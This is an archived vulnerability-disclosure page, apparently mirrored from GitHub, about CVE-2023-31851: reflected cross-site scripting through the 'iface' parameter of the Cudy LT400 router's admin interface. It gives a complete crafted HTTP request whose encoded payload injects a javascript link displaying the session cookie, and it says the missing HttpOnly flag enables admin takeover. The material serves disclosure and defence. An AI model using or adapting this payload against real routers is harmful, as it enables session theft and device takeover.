POC详情: 443b2dbd5f0bb337cd83651ca2782923ef6ac7f9

来源
https://github.com/CalfCrusher/CVE-2023-31851
关联漏洞
标题: Cudy Technology LT400 跨站脚本漏洞 (CVE-2023-31851)
描述:Cudy Technology LT400是中国Cudy Technology公司的一款无线路由器。 Cudy Technology LT400 1.13.4版本存在安全漏洞,该漏洞源于在 /cgi-bin/luci/admin/network/wireless/status中的 iface 参数中存在安全问题。
介绍
# CVE-2023-31851

Reflected cross-site scripting (XSS) attack exists in web-based management interface of Cudy LT400. 

The page `/cgi-bin/luci/admin/network/wireless/status` has reflected XSS via the `iface` parameter.

The methods of exploitation would involve sending a specially crafted request to the victim that includes malicious code.

**The affected application does not set the Session Cookie with the HttpOnly attribute; this can result in admin takeover via session token theft.**

Vulnerable firmware versions: 1.13.4 - 1.15.18 - 1.15.27

## PoC

```
GET /cgi-bin/luci/admin/network/wireless/status?iface=wlan00%22%29%27%20href%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3Exss%3C%2Fa%3E HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED
```

## Vendor

Shenzhen Cudy Technology

## CVE Reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31851

## Product Reference

https://www.cudy.com
文件快照

 [4.0K]  /data/pocs/443b2dbd5f0bb337cd83651ca2782923ef6ac7f9
└── [1.1K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。